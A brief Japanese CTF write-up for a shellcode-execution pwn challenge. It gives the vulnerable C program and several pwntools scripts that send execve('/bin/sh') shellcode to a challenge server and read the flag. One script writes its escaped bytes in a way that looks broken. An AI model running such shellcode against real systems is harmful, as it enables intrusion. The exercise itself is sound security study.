Alpacaをコントロール
int main(void) {
void *addr = mmap(NULL, 0x100, PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
puts("Alpaca> ");
fgets(addr, 0x100, stdin);
((void(*)())addr)();
return 0;
}
好きなシェルコードを送ろうの回
pwntoolsで横着するパターン
from pwn import *
context.arch = "amd64"
context.os = "linux"
p = remote("34.170.146.252", 29682)
sc = asm(shellcraft.sh())
p.sendline(sc)
p.sendline(f"cat f*")
p.interactive()
from pwn import *
context.arch = "amd64"
context.os = "linux"
p = remote("34.170.146.252", 29682)
sc = asm(shellcraft.cat("flag.txt"))
p.sendline(sc)
p.interactive()
asm書くパターン
(null-free / 22bytes)
from pwn import *
context.arch = "amd64"
context.os = "linux"
p = remote("34.170.146.252", 29682)
asm_code = r"""
xor esi, esi
mov rbx, 0x68732f2f6e69622f
push rsi
push rbx
push rsp
pop rdi
push 0x3b
pop rax
cdq
syscall
"""
sc = asm(asm_code)
p.sendline(sc)
p.sendline(f"cat f*")
p.interactive()
ベタ書き
from pwn import *
context.arch = "amd64"
context.os = "linux"
p = remote("34.170.146.252", 29682)
sc = (
b"\\x31\\xf6"
b"\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68"
b"\\x56"
b"\\x53"
b"\\x54"
b"\\x5f"
b"\\x6a\\x3b"
b"\\x58"
b"\\x99"
b"\\x0f\\x05"
)
p.sendline(sc)
p.sendline(f"cat f*")
p.interactive()
Shellcodes database for study cases が参考になります。